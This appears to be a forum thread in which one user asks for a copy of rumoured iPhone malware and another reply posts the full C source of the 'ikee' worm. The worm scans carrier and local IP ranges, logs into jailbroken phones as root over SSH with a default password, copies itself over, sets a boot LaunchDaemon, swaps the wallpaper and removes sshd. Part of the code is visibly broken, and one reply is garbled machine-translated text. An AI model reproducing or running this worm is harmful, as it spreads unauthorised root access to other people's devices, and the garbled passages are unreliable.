Skip navigation.
Home

Looking for that iPhone malware -- if it's real

|

Looking for the iPhone malware that is supposedly going around. If anyone has a copy I sure would love to get my hands on it.

Virus iOS4 out

Be careful not to hit Friends, but the most crucial point made iOS4 virus used the Unlock .. .. The animation style of the corners, 10-15 seconds after you click the ads were writing on the UNLOCK NOW FREE DOWNLOAD NOW FREE UNLOCK 2 Trailer beliriyormuş simdeki numbers, and all the data now but it's since been deleted in the past because they realized that the ... NOTE .. you iKaynak Welcome conscious members of the site, such as bi bi-click ad that you know will not unlock:) di?

Hey adam, If you're looking

Hey adam,

If you're looking for IKEX's worm for iPhone. Here is the source code for your reference.

//
// iPhone default pass worm by ikex
//
// This code is CLOSED source.
// And very hacky, i just needed it to work.
//
// Thanks to alan3423432432 haha for helping me work out my flaws in C
//

#include "main.h"

int fdlock;

// randHost(): Returns a random IP Address XXX.XXX.XXX.XXX
char *randHost(void)
{
int x,y,z;
char *retme;
srand (time (0));
x=random() % 255;
y=random() % 255;
z=random() % 255;
asprintf(&retme, "%i.%i.%i.", x,y,z);
return retme;
}

// get_lock(): Sets/Gets the status of the file lock
// located in /var/lock/bbot.lock
int get_lock(void)
{
struct flock fl;
fl.l_type = F_WRLCK;
fl.l_whence = SEEK_SET;
fl.l_start = 0;
fl.l_len = 1;
if((fdlock = open("/var/lock/bbot.lock", O_WRONLY|O_CREAT, 0666)) == -1)
return 0;
if(fcntl(fdlock, F_SETLK, &fl) == -1)
return 0;
return 1;
}

// getAddrRange(): Gets the phones 3G range + 2
// eg, 100.100.100.0-100.100.102.255
char *getAddrRange()
{
struct ifaddrs *ifaddr, *ifa;
int family, s;
char host[NI_MAXHOST];
if (getifaddrs(&ifaddr) == -1) {
perror("getifaddrs");
exit(EXIT_FAILURE);
}
for (ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next) {
family = ifa->ifa_addr->sa_family;
if (family == AF_INET)
{
if (family == AF_INET || family == AF_INET6) {
s = getnameinfo(ifa->ifa_addr,
(family == AF_INET) ? sizeof(struct sockaddr_in) :
sizeof(struct sockaddr_in6),
host, NI_MAXHOST, NULL, 0, NI_NUMERICHOST);
if (s != 0) {
printf("getnameinfo() failed: %s\n", gai_strerror(s));
return "0.0.0.0-0.0.0.0";
}

if (strcmp(ifa->ifa_name, "pdp_ip0") == 0)
{
syslog(LOG_DEBUG, ifa->ifa_name);
syslog(LOG_DEBUG, host);
char *wee[20];
tokenise(host, wee, ".");
char *range;
int octc = atoi(wee[2]);
asprintf(&range, "%s.%s.%i.0-%s.%s.%i.255", wee[0], wee[1], octc, wee[0], wee[1], octc+2);
return range;
}
}
}
}
freeifaddrs(ifaddr);
return "0.0.0.0-0.0.0.0";
}
// From alan2349024 Sorry i suck at remembering numbers
// Thanks dude!
int tokenise (char input[], char *token[], char* spl) // Added sep param
{
char *tokens;
int count = 0;

tokens = strtok(input, spl);//Change TOKEN_SEPERATORS To What You Want To Seperate Off

if(tokens[strlen(tokens) - 1] == '\n')
tokens[strlen(tokens) - 1] = '\0';

token[count] = tokens;

while(tokens != NULL)
{
count++;
if( count > MAX_NUM )//change MAX_NUM_TOKENS To A Number
return (-1);

tokens = strtok(NULL, spl);

if(tokens != NULL)
{
if(tokens[strlen(tokens) - 1] == '\n')
tokens[strlen(tokens) - 1] = '\0';
}
token[count] = tokens;
}
return count;
}

// Entry point.
int main(int argc, char *argv[])
{

//pid_t pid, sid;
//char *subnet = randHost();

// syslog(LOG_DEBUG, "I should go, i feel like im interupting something ;]");
/* // FORK CODE REMOVED IT FUCKS WITH LaunchDaemon.
pid = fork();
if (pid 0)
exit(EXIT_SUCCESS);

umask(0);

sid = setsid();
*/
if(get_lock() == 0) {
syslog(LOG_DEBUG, "I know when im not wanted *sniff*");
return 1; } // Already running.
sleep(60); // Lets wait for the network to come up 2 MINS
syslog(LOG_DEBUG, "IIIIIII Just want to tell you how im feeling");
//char ipRange[256] = "120.16.0.0-120.23.255.255";
char *locRanges = getAddrRange();
char *lanRanges = "192.168.0.0-192.168.255.255"; // #172.16.0.0-172.31.255.255 Ehh who uses it
char *vodRanges1 = "202.81.64.0-202.81.79.255";
char *vodRanges2 = "23.98.128.0-123.98.143.255";
char *vodRanges3 = "120.16.0.0-120.23.255.255";
char *optRanges1 = "114.72.0.0-114.75.255.255";
char *optRanges2 = "203.2.75.0-203.2.75.255";
char *optRanges3 = "210.49.0.0-210.49.255.255";
char *optRanges4 = "203.17.140.0-203.17.140.255";
char *optRanges5 = "203.17.138.0-203.17.138.255";
char *optRanges6 = "211.28.0.0-211.31.255.255";
char *telRanges = "58.160.0.0-58.175.255.25";
//char *attRanges = "32.0.0.0-32.255.255.255"; // TOO BIG

syslog(LOG_DEBUG, "awoadqdoqjdqjwiodjqoi aaah!");
ChangeOnBoot();
KillSSHD();
// Local first
while (1)
{
syslog(LOG_DEBUG, "Checking out the local scene yo");
scanner(locRanges);
syslog(LOG_DEBUG, "Random baby");
int i;
for (i=0; i 0) {
lon = sizeof(int);
getsockopt(soc, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
return -1;
}
}
else {
return -1; }
}
else { return -1; }
}
close(soc);
return 0;
// Set to blocking mode again...
//arg = fcntl(soc, F_GETFL, NULL);
//arg &= (~O_NONBLOCK);
//fcntl(soc, F_SETFL, arg);
}

int checkHost(char *host)
{
syslog(LOG_DEBUG, host);
FILE *in;
extern FILE *popen();
char buff[512];
char *execLine;
asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'", VULN_PASS, host);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, 2, in) != NULL ) {
if (strcmp(buff, "99"))
return 0;
}
pclose(in);
return -1; // NOT VULN
}

int runCommand(char* command, char *host)
{
FILE *in;
extern FILE *popen();
char buff[512];
char *execLine;
// Really am to lazy to check this but im piling comands as so
// command1; command2; command3; echo 99
// my belief is that if for instance command2 dies we wont hit the echo 99
// which will make us return -1
asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s ; echo 99'",VULN_PASS, host, command);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, 2, in) != NULL ) {
if (strcmp(buff, "99"))
return 0;
}
pclose(in);
return -1;
}

int prunCommand(char* command, char *host)
{
FILE *in;
extern FILE *popen();
char buff[512];
char *execLine;
asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s'",VULN_PASS, host, command);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, sizeof(buff), in) != NULL ) {
printf("%s",buff);
}
pclose(in);
return -1;
}

int CopyFile(char* src, char* dst, char* host)
{
FILE *in;
extern FILE *popen();
char buff[512];
char *execLine;
asprintf(&execLine, "sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s", VULN_PASS, src, host, dst);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, sizeof(buff), in) != NULL ) {}
asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'which %s'", VULN_PASS, host, dst);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, 2, in) != NULL ) {
if (strcmp(buff, dst))
return 0;
}
pclose(in);
return -1;
}

int ChangeOnBoot()
{
FILE *in;
extern FILE *popen();
if (!(in = popen("cp /var/log/youcanbeclosertogod.jpg /var/mobile/Library/LockBackground.jpg", "r"))) {
return -1;
}
return 0;
}

int KillSSHD()
{
FILE *in;
extern FILE *popen();
if (!(in = popen("rm -f /usr/sbin/sshd; killall sshd", "r"))) {
return -1;
}
return 0;
}

int infectHost(char *host)
{
// Copy myself to them
// run as startup
if (runCommand("uname -n", host) == 0)
{
//printf("\n\r - Infecting: ");
prunCommand("uname -n", host);
prunCommand("rm /bin/sshpass", host);
prunCommand("rm /bin/poc-bbot", host);
//prunCommand("killall poc-bbot", host);
if (CopyFile("/bin/poc-bbot", "/bin/poc-bbot", host) == 0 && CopyFile("/bin/sshpass", "/bin/sshpass", host) == 0)
{
//printf(" - Replicated successfully");
prunCommand("rm /var/mobile/Library/LockBackground.jpg; echo \"\r\n - Removed old background\"", host);
// Revision 3 - idea from nevermore!
// This way dipshits wont delete my stuff
CopyFile("/var/log/youcanbeclosertogod.jpg", "/var/mobile/Library/LockBackground.jpg", host);
CopyFile("/var/log/youcanbeclosertogod.jpg", "/var/log/youcanbeclosertogod.jpg", host);
//CopyFile("/var/mobile/Library/LockBackground.jpg", "/var/mobile/Library/LockBackground.jpg", host); // We aren't
installing an app.

//printf(" - Background set (ast.jpg).");
CopyFile("/System/Library/LaunchDaemons/com.ikey.bbot.plist", "/System/Library/LaunchDaemons/com.ikey.bbot.plist",
host);
prunCommand("launchctl load /System/Library/LaunchDaemons/com.ikey.bbot.plist", host);
// I didn't want to have to do this.
prunCommand("rm -f /Library/LaunchDaemons/com.openssh.sshd.plist; launchctl unload
/Library/LaunchDaemons/com.openssh.sshd.plist", host);
prunCommand("killall sshd", host);
//printf("\n\r - Program set to startup on boot");
//prunCommand("reboot", host)
//printf("\n\r - Rebooting phone!");
//CopyFile("ngtgyu.m4r", "/var/mobile/ngtgyu.m4r", host);
//printf("\n\r - Ringtone set (ngtgyu.m4r).");
}
}
return 0;
}

// END

Cheers :)
Kish

--
Remember there is alwayz someone who knows more than us out there

Adam, the one you're talking was a fake... ;)

Hey Adam, the "iPhone malware" your are talking, the one of last week, was a fake...

(This one above is the old ikee - november 2009)